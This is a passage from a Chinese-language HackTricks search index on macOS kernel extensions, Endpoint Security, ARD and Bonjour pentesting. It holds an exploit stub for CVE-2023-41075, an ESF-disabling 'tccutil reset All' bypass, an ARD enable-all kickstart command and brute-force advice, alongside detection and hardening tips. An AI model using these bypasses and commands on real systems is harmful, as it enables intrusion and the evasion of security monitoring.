Extensions & Debugging » Local Kerlnelcache","id":"2179","title":"Local Kerlnelcache"},"218":{"body":"一种查找可能与IPv6地址相关的子域的方法是利用搜索引擎。例如,使用查询模式ipv6.*可能是有效的。具体来说,可以在Google中使用以下搜索命令: bash site:ipv6./","breadcrumbs":"Pentesting Network » Pentesting IPv6 » Exploring Subdomains","id":"218","title":"Exploring Subdomains"},"2180":{"body":"KernelDebugKit Github 在 https://github.com/dortania/KdkSupportPkg/releases 可以找到所有的内核调试工具包。你可以下载它,挂载它,用 Suspicious Package 工具打开它,访问 .kext 文件夹并 提取它 。 使用以下命令检查符号: bash nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l theapplewiki.com , ipsw.me , theiphonewiki.com 有时,Apple 会发布带有 symbols 的 kernelcache 。您可以通过这些页面上的链接下载一些带有符号的固件。固件将包含 kernelcache 以及其他文件。 要 extract 文件,首先将扩展名从 .ipsw 更改为 .zip 并 unzip 它。 提取固件后,您将获得一个文件,如: kernelcache.release.iphone14 。它是 IMG4 格式,您可以使用以下工具提取有趣的信息: pyimg4 : bash pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e img4tool : bash img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 下载","id":"2180","title":"下载"},"2181":{"body":"检查 kernelcache 是否具有符号 bash nm -a kernelcache.release.iphone14.e | wc -l 通过这个,我们现在可以 提取所有扩展 或 您感兴趣的扩展: bash # List all extensions\\nkextex -l kernelcache.release.iphone14.e\\n## Extract com.apple.security.sandbox\\nkextex -e com.apple.security.sandbox kernelcache.release.iphone14.e # Extract all\\nkextex_all kernelcache.release.iphone14.e # Check the extension for symbols\\nnm -a binaries/com.apple.security.sandbox | wc -l","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » Inspecting kernelcache","id":"2181","title":"Inspecting kernelcache"},"2182":{"body":"年份 CVE 摘要 2024 CVE-2024-44243 storagekitd 中的逻辑缺陷允许 root 攻击者注册一个恶意文件系统包,最终加载一个 未签名的 kext , 绕过系统完整性保护 (SIP) 并启用持久性 rootkit。已在 macOS 14.2 / 15.2 中修补。 2021 CVE-2021-30892 ( Shrootless ) 带有 com.apple.rootless.install 权限的安装守护进程可能被滥用以执行任意后安装脚本,禁用 SIP 并加载任意 kext。 红队员的要点 寻找与磁盘仲裁、安装程序或 Kext 管理交互的有权限的守护进程 (codesign -dvv /path/bin | grep entitlements)。 滥用 SIP 绕过几乎总是授予加载 kext 的能力 → 内核代码执行 。 防御提示 保持 SIP 启用 ,监控来自非 Apple 二进制文件的 kmutil load/kmutil create -n aux 调用,并对任何写入 /Library/Extensions 的操作发出警报。端点安全事件 ES_EVENT_TYPE_NOTIFY_KEXTLOAD 提供近实时的可见性。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 最近的漏洞与利用技术","id":"2182","title":"最近的漏洞与利用技术"},"2183":{"body":"苹果推荐的工作流程是构建一个与正在运行的版本匹配的 内核调试工具包 (KDK) ,然后通过 KDP (内核调试协议) 网络会话附加 LLDB 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 调试 macOS 内核与 kexts","id":"2183","title":"调试 macOS 内核与 kexts"},"2184":{"body":"bash # Create a symbolication bundle for the latest panic\\nsudo kdpwrit dump latest.kcdata\\nkmutil analyze-panic latest.kcdata -o ~/panic_report.txt","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 一次性本地调试 panic","id":"2184","title":"一次性本地调试 panic"},"2185":{"body":"下载并安装目标机器的确切 KDK 版本。 使用 USB-C 或 Thunderbolt 电缆 将目标 Mac 和主机 Mac 连接起来。 在 目标 : bash sudo nvram boot-args=\\"debug=0x100 kdp_match_name=macbook-target\\"\\nreboot 在 主机 上: bash lldb\\n(lldb) kdp-remote \\"udp://macbook-target\\"\\n(lldb) bt # get backtrace in kernel context","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 从另一台 Mac 进行实时远程调试","id":"2185","title":"从另一台 Mac 进行实时远程调试"},"2186":{"body":"bash # Identify load address of the kext\\nADDR=$(kmutil showloaded --bundle-identifier com.example.driver | awk \'{print $4}\') # Attach\\nsudo lldb -n kernel_task -o \\"target modules load --file /Library/Extensions/Example.kext/Contents/MacOS/Example --slide $ADDR\\" ℹ️ KDP 仅暴露一个 只读 接口。对于动态插桩,您需要在磁盘上修补二进制文件,利用 内核函数钩子 (例如 mach_override)或将驱动程序迁移到 虚拟机监控程序 以实现完全的读/写。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » 将 LLDB 附加到特定加载的 kext","id":"2186","title":"将 LLDB 附加到特定加载的 kext"},"2187":{"body":"DriverKit Security – Apple Platform Security Guide Microsoft Security Blog – Analyzing CVE-2024-44243 SIP bypass tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Extensions & Debugging » References","id":"2187","title":"References"},"2188":{"body":"Reading time: 6 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » macOS Kernel Vulnerabilities","id":"2188","title":"macOS Kernel Vulnerabilities"},"2189":{"body":"在本报告中 解释了几个漏洞,这些漏洞允许通过软件更新程序来破坏内核。 PoC 。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » Pwning OTA","id":"2189","title":"Pwning OTA"},"219":{"body":"要识别 IPv6 地址,可以查询某些 DNS 记录类型: AXFR :请求完整的区域传输,可能会揭示广泛的 DNS 记录。 AAAA :直接查找 IPv6 地址。 ANY :一个广泛的查询,返回所有可用的 DNS 记录。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 利用 DNS 查询","id":"219","title":"利用 DNS 查询"},"2190":{"body":"苹果在2024年3月修复了两个在iOS和macOS上被积极利用的内存损坏漏洞(在macOS 14.4/13.6.5/12.7.4中修复)。 CVE-2024-23225 – 内核 • XNU虚拟内存子系统中的越界写入允许一个无特权进程在内核地址空间中获得任意的读/写权限,绕过PAC/KTRR。 • 通过一个精心制作的XPC消息从用户空间触发,该消息溢出libxpc中的缓冲区,然后在解析消息时转入内核。 CVE-2024-23296 – RTKit • 苹果硅RTKit(实时协处理器)中的内存损坏。 • 观察到的利用链使用CVE-2024-23225进行内核读/写,并使用CVE-2024-23296逃离安全协处理器沙箱并禁用PAC。 补丁级别检测: bash sw_vers # ProductVersion 14.4 or later is patched\\nauthenticate sudo sysctl kern.osversion # 23E214 or later for Sonoma 如果无法升级,请通过禁用易受攻击的服务来减轻风险: bash launchctl disable system/com.apple.analyticsd\\nlaunchctl disable system/com.apple.rtcreportingd","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 2024: 在野外的内核0天漏洞 (CVE-2024-23225 & CVE-2024-23296)","id":"2190","title":"2024: 在野外的内核0天漏洞 (CVE-2024-23225 & CVE-2024-23296)"},"2191":{"body":"mach_msg() 请求发送到一个没有特权的 IOKit 用户客户端,导致 MIG 生成的胶水代码中的 类型混淆 。当回复消息被重新解释为一个比最初分配的更大的离线描述符时,攻击者可以实现对内核堆区域的受控 OOB 写入 ,并最终提升到 root。 原始概述(Sonoma 14.0-14.1,Ventura 13.5-13.6): c // userspace stub\\ntyped_port_t p = get_user_client();\\nuint8_t spray[0x4000] = {0x41};\\n// heap-spray via IOSurfaceFastSetValue\\nio_service_open_extended(...);\\n// malformed MIG message triggers confusion\\nmach_msg(&msg.header, MACH_SEND_MSG|MACH_RCV_MSG, ...); 公共漏洞利用该漏洞的方法包括: 用活动端口指针喷洒 ipc_kmsg 缓冲区。 覆盖悬挂端口的 ip_kobject。 使用 mprotect() 跳转到映射在 PAC 伪造地址的 shellcode。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 2023: MIG 类型混淆 – CVE-2023-41075","id":"2191","title":"2023: MIG 类型混淆 – CVE-2023-41075"},"2192":{"body":"来自微软的安全研究人员显示,高权限守护进程 storagekitd 可以被迫加载一个 未签名的内核扩展 ,从而在完全修补的 macOS(15.2 之前)上完全禁用 系统完整性保护(SIP) 。攻击流程如下: 滥用私有权限 com.apple.storagekitd.kernel-management 在攻击者控制下生成一个助手。 助手调用 IOService::AddPersonalitiesFromKernelModule,并使用指向恶意 kext 包的精心制作的信息字典。 因为 SIP 信任检查是在 storagekitd 阶段后执行的,所以代码在验证之前以 ring-0 执行,并且可以通过 csr_set_allow_all(1) 关闭 SIP。 检测提示: bash kmutil showloaded | grep -v com.apple # list non-Apple kexts\\nlog stream --style syslog --predicate \'senderImagePath contains \\"storagekitd\\"\' # watch for suspicious child procs 立即修复的方法是更新到 macOS Sequoia 15.2 或更高版本。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 2024-2025: 通过第三方 Kext 绕过 SIP – CVE-2024-44243(又名“Sigma”)","id":"2192","title":"2024-2025: 通过第三方 Kext 绕过 SIP – CVE-2024-44243(又名“Sigma”)"},"2193":{"body":"bash uname -a # Kernel build\\nkmutil showloaded # List loaded kernel extensions\\nkextstat | grep -v com.apple # Legacy (pre-Catalina) kext list\\nsysctl kern.kaslr_enable # Verify KASLR is ON (should be 1)\\ncsrutil status # Check SIP from RecoveryOS\\nspctl --status # Confirms Gatekeeper state","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » 快速枚举备忘单","id":"2193","title":"快速枚举备忘单"},"2194":{"body":"Luftrauser – Mach 消息模糊测试器,针对 MIG 子系统 (github.com/preshing/luftrauser)。 oob-executor – 用于 CVE-2024-23225 研究的 IPC 越界原语生成器。 kmutil inspect – 内置的 Apple 工具 (macOS 11+) 用于在加载前静态分析 kexts:kmutil inspect -b io.kext.bundleID。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » Fuzzing & Research Tools","id":"2194","title":"Fuzzing & Research Tools"},"2195":{"body":"Apple. “About the security content of macOS Sonoma 14.4.” https://support.apple.com/en-us/120895 Microsoft Security Blog. “Analyzing CVE-2024-44243, a macOS System Integrity Protection bypass through kernel extensions.” https://www.microsoft.com/en-us/security/blog/2025/01/13/analyzing-cve-2024-44243-a-macos-system-integrity-protection-bypass-through-kernel-extensions/ tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS Kernel Vulnerabilities » References","id":"2195","title":"References"},"2196":{"body":"Reading time: 8 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » macOS 系统扩展","id":"2196","title":"macOS 系统扩展"},"2197":{"body":"与内核扩展不同, 系统扩展在用户空间中运行 ,而不是内核空间,从而降低了由于扩展故障导致系统崩溃的风险。 系统扩展有三种类型: DriverKit 扩展、 网络 扩展和 端点安全 扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 系统扩展 / 端点安全框架","id":"2197","title":"系统扩展 / 端点安全框架"},"2198":{"body":"DriverKit 是内核扩展的替代品, 提供硬件支持 。它允许设备驱动程序(如 USB、串行、NIC 和 HID 驱动程序)在用户空间中运行,而不是内核空间。DriverKit 框架包括 某些 I/O Kit 类的用户空间版本 ,内核将正常的 I/O Kit 事件转发到用户空间,为这些驱动程序提供了一个更安全的运行环境。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » DriverKit 扩展","id":"2198","title":"DriverKit 扩展"},"2199":{"body":"网络扩展提供了自定义网络行为的能力。网络扩展有几种类型: 应用代理 :用于创建实现流式定制 VPN 协议的 VPN 客户端。这意味着它根据连接(或流)而不是单个数据包处理网络流量。 数据包隧道 :用于创建实现数据包导向定制 VPN 协议的 VPN 客户端。这意味着它根据单个数据包处理网络流量。 过滤数据 :用于过滤网络“流”。它可以在流级别监控或修改网络数据。 过滤数据包 :用于过滤单个网络数据包。它可以在数据包级别监控或修改网络数据。 DNS 代理 :用于创建自定义 DNS 提供程序。它可以用于监控或修改 DNS 请求和响应。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 网络扩展","id":"2199","title":"网络扩展"},"22":{"body":"Reading time: 3 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"About the author » 关于作者","id":"22","title":"关于作者"},"220":{"body":"在确定与组织相关的 IPv6 地址后,可以使用 ping6 工具进行探测。该工具有助于评估识别出的 IPv6 地址的响应能力,并可能帮助发现相邻的 IPv6 设备。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » 使用 Ping6 进行探测","id":"220","title":"使用 Ping6 进行探测"},"2200":{"body":"端点安全是 Apple 在 macOS 中提供的一个框架,提供了一组用于系统安全的 API。它旨在供 安全供应商和开发人员构建能够监控和控制系统活动 的产品,以识别和防止恶意活动。 该框架提供了一组 监控和控制系统活动的 API ,例如进程执行、文件系统事件、网络和内核事件。 该框架的核心在内核中实现,作为位于 /System/Library/Extensions/EndpointSecurity.kext 的内核扩展(KEXT)。该 KEXT 由几个关键组件组成: EndpointSecurityDriver :作为内核扩展的“入口点”。它是操作系统与端点安全框架之间的主要交互点。 EndpointSecurityEventManager :该组件负责实现内核钩子。内核钩子允许框架通过拦截系统调用来监控系统事件。 EndpointSecurityClientManager :管理与用户空间客户端的通信,跟踪哪些客户端已连接并需要接收事件通知。 EndpointSecurityMessageManager :向用户空间客户端发送消息和事件通知。 端点安全框架可以监控的事件分为: 文件事件 进程事件 套接字事件 内核事件(例如加载/卸载内核扩展或打开 I/O Kit 设备)","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 端点安全框架","id":"2200","title":"端点安全框架"},"2201":{"body":"与端点安全框架的用户空间通信 通过 IOUserClient 类进行。根据调用者的类型使用两种不同的子类: EndpointSecurityDriverClient :这需要 com.apple.private.endpoint-security.manager 权限,仅由系统进程 endpointsecurityd 持有。 EndpointSecurityExternalClient :这需要 com.apple.developer.endpoint-security.client 权限。通常由需要与端点安全框架交互的第三方安全软件使用。 端点安全扩展: libEndpointSecurity.dylib 是系统扩展用于与内核通信的 C 库。该库使用 I/O Kit (IOKit) 与端点安全 KEXT 进行通信。 endpointsecurityd 是一个关键的系统守护进程,负责管理和启动端点安全系统扩展,特别是在早期启动过程中。 只有标记为 NSEndpointSecurityEarlyBoot 的系统扩展 在其 Info.plist 文件中接收这种早期启动处理。 另一个系统守护进程, sysextd , 验证系统扩展 并将其移动到适当的系统位置。然后,它请求相关守护进程加载扩展。 SystemExtensions.framework 负责激活和停用系统扩展。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 端点安全框架架构","id":"2201","title":"端点安全框架架构"},"2202":{"body":"ESF 被安全工具使用,这些工具会尝试检测红队人员,因此任何关于如何避免这一点的信息都很有趣。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 绕过 ESF","id":"2202","title":"绕过 ESF"},"2203":{"body":"问题在于安全应用程序需要具有 完全磁盘访问权限 。因此,如果攻击者能够移除该权限,他可以阻止软件运行: bash tccutil reset All 有关此绕过及相关内容的 更多信息 ,请查看演讲 #OBTS v5.0: \\"The Achilles Heel of EndpointSecurity\\" - Fitzl Csaba 最终,通过将新的权限 kTCCServiceEndpointSecurityClient 授予由 tccd 管理的安全应用程序来修复此问题,因此 tccutil 不会清除其权限,从而防止其运行。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » CVE-2021-30965","id":"2203","title":"CVE-2021-30965"},"2204":{"body":"OBTS v3.0: \\"Endpoint Security & Insecurity\\" - Scott Knight https://knight.sc/reverse%20engineering/2019/08/24/system-extension-internals.html tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Kernel & System Extensions » macOS System Extensions » 参考文献","id":"2204","title":"参考文献"},"2205":{"body":"Reading time: 13 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » macOS 网络服务与协议","id":"2205","title":"macOS 网络服务与协议"},"2206":{"body":"这些是常见的 macOS 服务,可以远程访问它们。 您可以在 System Settings --> Sharing 中启用/禁用这些服务。 VNC ,称为“屏幕共享”(tcp:5900) SSH ,称为“远程登录”(tcp:22) Apple Remote Desktop (ARD),或称为“远程管理”(tcp:3283, tcp:5900) AppleEvent ,称为“远程 Apple 事件”(tcp:3031) 检查是否启用了任何服务,运行: bash rmMgmt=$(netstat -na | grep LISTEN | grep tcp46 | grep \\"*.3283\\" | wc -l);\\nscrShrng=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.5900\\" | wc -l);\\nflShrng=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | egrep \\"\\\\\\\\*.88|\\\\\\\\*.445|\\\\\\\\*.548\\" | wc -l);\\nrLgn=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.22\\" | wc -l);\\nrAE=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.3031\\" | wc -l);\\nbmM=$(netstat -na | grep LISTEN | egrep \'tcp4|tcp6\' | grep \\"*.4488\\" | wc -l);\\nprintf \\"\\\\nThe following services are OFF if \'0\', or ON otherwise:\\\\nScreen Sharing: %s\\\\nFile Sharing: %s\\\\nRemote Login: %s\\\\nRemote Mgmt: %s\\\\nRemote Apple Events: %s\\\\nBack to My Mac: %s\\\\n\\\\n\\" \\"$scrShrng\\" \\"$flShrng\\" \\"$rLgn\\" \\"$rmMgmt\\" \\"$rAE\\" \\"$bmM\\";","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 远程访问服务","id":"2206","title":"远程访问服务"},"2207":{"body":"Apple Remote Desktop (ARD) 是一个针对 macOS 的增强版 Virtual Network Computing (VNC) ,提供额外的功能。ARD 中一个显著的漏洞是其控制屏幕密码的认证方法,仅使用密码的前 8 个字符,使其容易受到 brute force attacks 的攻击,使用像 Hydra 或 GoRedShell 这样的工具,因为没有默认的速率限制。 可以使用 nmap 的 vnc-info 脚本识别易受攻击的实例。支持 VNC Authentication (2) 的服务由于 8 个字符密码的截断,尤其容易受到暴力攻击。 要启用 ARD 以进行特权提升、GUI 访问或用户监控等各种管理任务,请使用以下命令: bash sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -clientopts -setmenuextra -menuextra yes ARD 提供多种控制级别,包括观察、共享控制和完全控制,且会话在用户密码更改后仍然持续。它允许直接发送 Unix 命令,并以 root 身份执行这些命令,适用于管理用户。任务调度和远程 Spotlight 搜索是显著特性,便于在多台机器上进行低影响的敏感文件远程搜索。 最近的屏幕共享 / ARD 漏洞 (2023-2025) 年份 CVE 组件 影响 修复于 2023 CVE-2023-42940 屏幕共享 不正确的会话渲染可能导致传输 错误 的桌面或窗口,从而泄露敏感信息 macOS Sonoma 14.2.1 (2023年12月) 2024 CVE-2024-23296 launchservicesd / login 内核内存保护绕过,可在成功远程登录后链接(在野外被积极利用) macOS Ventura 13.6.4 / Sonoma 14.4 (2024年3月) 加固建议 在不严格需要时禁用 屏幕共享 / 远程管理 。 保持 macOS 完全更新(Apple 通常为最近三个主要版本发布安全修复)。 使用 强密码 并 在可能的情况下强制*“VNC 观看者可能使用密码控制屏幕”*选项 禁用 。 将服务放在 VPN 后面,而不是将 TCP 5900/3283 暴露于互联网。 添加应用防火墙规则,将 ARDAgent 限制在本地子网内: bash sudo /usr/libexec/ApplicationFirewall/socketfilterfw --add /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent\\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --setblockapp /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent on","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » Pentesting ARD","id":"2207","title":"Pentesting ARD"},"2208":{"body":"Bonjour 是一项由 Apple 设计的技术,允许 同一网络上的设备检测彼此提供的服务 。也称为 Rendezvous、 零配置 或 Zeroconf,它使设备能够加入 TCP/IP 网络, 自动选择 IP 地址 ,并将其服务广播给其他网络设备。 Bonjour 提供的零配置网络确保设备可以: 自动获取 IP 地址 ,即使在没有 DHCP 服务器的情况下。 执行 名称到地址的转换 ,而无需 DNS 服务器。 发现 网络上可用的服务。 使用 Bonjour 的设备将自我分配一个 来自 169.254/16 范围的 IP 地址 ,并验证其在网络上的唯一性。Mac 会为该子网维护一个路由表条目,可以通过 netstat -rn | grep 169 验证。 对于 DNS,Bonjour 使用 多播 DNS (mDNS) 协议 。mDNS 在 5353/UDP 端口 上运行,采用 标准 DNS 查询 ,但目标是 多播地址 224.0.0.251 。这种方法确保网络上所有监听设备都能接收并响应查询,从而促进其记录的更新。 加入网络时,每个设备自我选择一个名称,通常以**.local** 结尾,可能源自主机名或随机生成。 网络内的服务发现由 DNS 服务发现 (DNS-SD) 促进。利用 DNS SRV 记录的格式,DNS-SD 使用 DNS PTR 记录 来启用多个服务的列出。寻求特定服务的客户端将请求 . 的 PTR 记录,如果该服务可从多个主机提供,则返回格式为 .. 的 PTR 记录列表。 可以使用 dns-sd 工具来 发现和广告网络服务 。以下是其用法的一些示例:","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » Bonjour 协议","id":"2208","title":"Bonjour 协议"},"2209":{"body":"要在网络上搜索 SSH 服务,可以使用以下命令: bash dns-sd -B _ssh._tcp 此命令启动对 _ssh._tcp 服务的浏览,并输出详细信息,如时间戳、标志、接口、域、服务类型和实例名称。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 搜索 SSH 服务","id":"2209","title":"搜索 SSH 服务"},"221":{"body":"以下部分涵盖可以在 同一 /64 段内 执行的实际层 2 IPv6 攻击,而无需知道任何全局前缀。下面显示的所有数据包都是 链路本地 的,仅通过本地交换机传输,使它们在大多数环境中极其隐蔽。","breadcrumbs":"Pentesting Network » Pentesting IPv6 » IPv6 本地网络攻击技术","id":"221","title":"IPv6 本地网络攻击技术"},"2210":{"body":"要广播 HTTP 服务,您可以使用: bash dns-sd -R \\"Index\\" _http._tcp . 80 path=/index.html 此命令在端口 80 上注册一个名为 \\"Index\\" 的 HTTP 服务,路径为 /index.html。 然后在网络上搜索 HTTP 服务: bash dns-sd -B _http._tcp 当服务启动时,它通过多播其存在向子网中的所有设备宣布其可用性。对这些服务感兴趣的设备无需发送请求,只需监听这些公告。 为了提供更友好的用户界面,可以在 Apple App Store 上使用 Discovery - DNS-SD Browser 应用程序可视化您本地网络上提供的服务。 或者,可以编写自定义脚本使用 python-zeroconf 库浏览和发现服务。 python-zeroconf 脚本演示了如何为 _http._tcp.local. 服务创建服务浏览器,打印添加或移除的服务: python from zeroconf import ServiceBrowser, Zeroconf class MyListener: def remove_service(self, zeroconf, type, name):\\nprint(\\"Service %s removed\\" % (name,)) def add_service(self, zeroconf, type, name):\\ninfo = zeroconf.get_service_info(type, name)\\nprint(\\"Service %s added, service info: %s\\" % (name, info)) zeroconf = Zeroconf()\\nlistener = MyListener()\\nbrowser = ServiceBrowser(zeroconf, \\"_http._tcp.local.\\", listener)\\ntry:\\ninput(\\"Press enter to exit...\\\\n\\\\n\\")\\nfinally:\\nzeroconf.close()","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 广播 HTTP 服务","id":"2210","title":"广播 HTTP 服务"},"2211":{"body":"Nmap NSE – 发现单个主机广告的服务: bash nmap -sU -p 5353 --script=dns-service-discovery dns-service-discovery 脚本发送一个 _services._dns-sd._udp.local 查询,然后枚举每个广告的服务类型。 mdns_recon – 一个 Python 工具,扫描整个范围以寻找 配置错误 的 mDNS 响应者,这些响应者回答单播查询(有助于找到跨子网/WAN 可达的设备): bash git clone https://github.com/chadillac/mdns_recon && cd mdns_recon\\npython3 mdns_recon.py -r 192.0.2.0/24 -s _ssh._tcp.local 这将返回通过 Bonjour 在本地链路外暴露 SSH 的主机。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 在网络上枚举 Bonjour","id":"2211","title":"在网络上枚举 Bonjour"},"2212":{"body":"年份 CVE 严重性 问题 修复版本 2024 CVE-2024-44183 中等 在 mDNSResponder 中的逻辑错误允许一个构造的包触发 拒绝服务 macOS Ventura 13.7 / Sonoma 14.7 / Sequoia 15.0 (2024年9月) 2025 CVE-2025-31222 高 在 mDNSResponder 中的正确性问题可能被滥用以进行 本地特权提升 macOS Ventura 13.7.6 / Sonoma 14.7.6 / Sequoia 15.5 (2025年5月) 缓解指导 将 UDP 5353 限制为 链路本地 范围 – 在无线控制器、路由器和基于主机的防火墙上阻止或限速。 在不需要服务发现的系统上完全禁用 Bonjour: bash sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist 对于内部需要 Bonjour 但绝不能跨越网络边界的环境,使用 AirPlay Receiver 配置限制 (MDM) 或 mDNS 代理。 启用 系统完整性保护 (SIP) 并保持 macOS 更新 – 上述两个漏洞都迅速修复,但依赖于启用 SIP 以获得全面保护。","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 安全考虑与近期漏洞 (2024-2025)","id":"2212","title":"安全考虑与近期漏洞 (2024-2025)"},"2213":{"body":"如果出于安全或其他原因需要禁用 Bonjour,可以使用以下命令关闭它: bash sudo launchctl unload -w /System/Library/LaunchDaemons/com.apple.mDNSResponder.plist","breadcrumbs":"macOS Security & Privilege Escalation » macOS Network Services & Protocols » 禁用 Bonjour","id":"2213","title":"禁用 Bonjour"},"2214":{"body":"The Mac Hacker\'s Handbook https://taomm.org/vol1/analysis.html https://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html NVD – CVE-2023-42940 NVD – CVE-2024-44183 tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 